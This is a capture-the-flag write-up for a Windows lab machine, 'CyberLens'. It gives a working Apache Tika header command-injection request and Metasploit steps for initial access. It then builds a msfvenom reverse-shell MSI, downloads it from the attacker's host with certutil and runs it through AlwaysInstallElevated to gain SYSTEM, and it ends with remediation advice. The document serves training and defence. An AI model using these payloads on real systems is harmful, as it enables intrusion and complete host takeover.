Target IP: cyberlens.thm (Requires /etc/hosts entry) Difficulty: Easy Objective: User (user.txt) & Root (admin.txt) Flags

1. Executive Summary

“CyberLens” is a Windows Server 2019 machine hosting a web analysis tool. We gain initial access by exploiting a Command Injection vulnerability in Apache Tika 1.17 (CVE-2018-1335) running on port 61777. Privilege escalation to NT AUTHORITY\SYSTEM is achieved by abusing the AlwaysInstallElevated registry setting, which allows any user to install .msi packages with SYSTEM privileges.

Key TTPs (MITRE ATT&CK):

  • T1190 (Exploit Public-Facing App): Header Injection in Apache Tika.
  • T1595 (Active Scanning): Nmap port discovery.
  • T1068 (Exploitation for Privilege Escalation): Abusing Installer Privileges (AlwaysInstallElevated).

2. Operational Setup

Host Configuration

echo "10.10.x.x cyberlens.thm" | sudo tee -a /etc/hosts

3. Enumeration

A. Network Scanning

Your Nmap scan was very thorough.

  • 80/tcp: Web Server (CyberLens Image Extractor).
  • 61777/tcp: HTTP Service.
  • 3389/tcp: RDP.
  • 135/139/445: Standard Windows RPC/SMB.

B. Service Analysis (Port 61777)

Investigating the non-standard port 61777 is the priority.

  • Banner Grabbing: curl -v http://cyberlens.thm:61777 or viewing source often reveals “Apache Tika 1.17”.
  • Vulnerability: A quick search reveals CVE-2018-1335.

The Vulnerability (Header Injection):

Apache Tika 1.17 allows clients to specify the X-Tika-OCRTesseractPath header. By manipulating this header, we can inject commands that the server executes when processing an image.


4. Initial Access: Apache Tika RCE

Method 1: Metasploit (Your approach)

msfconsole
use exploit/windows/http/apache_tika_header_command_injection
set RHOSTS cyberlens.thm
set RPORT 61777
set LHOST tun0
run

Status: Meterpreter shell as CyberLens user.

Method 2: Manual (Burp/Curl)

For the record, this can be done manually by sending a PUT request:

PUT /meta HTTP/1.1
Host: cyberlens.thm:61777
X-Tika-OCRTesseractPath: "cscript"
X-Tika-OCRLanguage: //E:Jscript
Expect: 100-continue
Content-Length: 0
 
var oShell = WScript.CreateObject("WScript.Shell");
var oExec = oShell.Exec("cmd /c whoami");

5. Privilege Escalation: AlwaysInstallElevated

Enumeration

You ran winPEAS and spotted the golden configuration:

AlwaysInstallElevated set to 1 in HKLM!
AlwaysInstallElevated set to 1 in HKCU!

What is this? This is a registry setting intended for corporate environments where standard users need to install software. When set to 1 in both HKCU (Current User) and HKLM (Local Machine), the Windows Installer service (msiexec.exe) installs ANY .msi package with SYSTEM privileges, regardless of who runs it.

The Exploit: Malicious MSI

Method 1: Metasploit (The “Easy” Way) You likely used exploit/windows/local/always_install_elevated. This module automatically builds a random MSI, uploads it, and runs it.

Method 2: Manual MSI Generation (The “PoC” Way) It is surprisingly simple to do this manually.

1. Generate the MSI: We use msfvenom to create a Windows Installer package that executes a reverse shell.

# -f msi : Output format is MSI
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.YOUR.IP LPORT=6969 -f msi -o setup.msi

2. Transfer to Target:

# On Attacker: python3 -m http.server 80
# On Target:
certutil -urlcache -f http://10.10.YOUR.IP/setup.msi setup.msi

3. Execute: We use msiexec to run the installer.

# /quiet = No UI
# /qn = No UI
# /i = Install
msiexec /quiet /qn /i setup.msi

4. Catch the Shell: Check your listener (nc -lvnp 6969).

C:\Windows\system32> whoami
nt authority\system

Flags:

  • User: C:\Users\CyberLens\Desktop\user.txt
  • Admin: C:\Users\Administrator\Desktop\admin.txt

6. Remediation (Blue Team)

  1. Patch Apache Tika: Upgrade to version 1.18 or later, where header validation was introduced.
  2. Disable AlwaysInstallElevated:
  • Group Policy: Computer Configuration -> Administrative Templates -> Windows Components -> Windows Installer -> “Always install with elevated privileges” -> Disabled.
  • Registry: Ensure the keys in HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer and HKCU are set to 0 or removed.
  1. Network Segmentation: Management interfaces like Tika (61777) should not be exposed to the general network.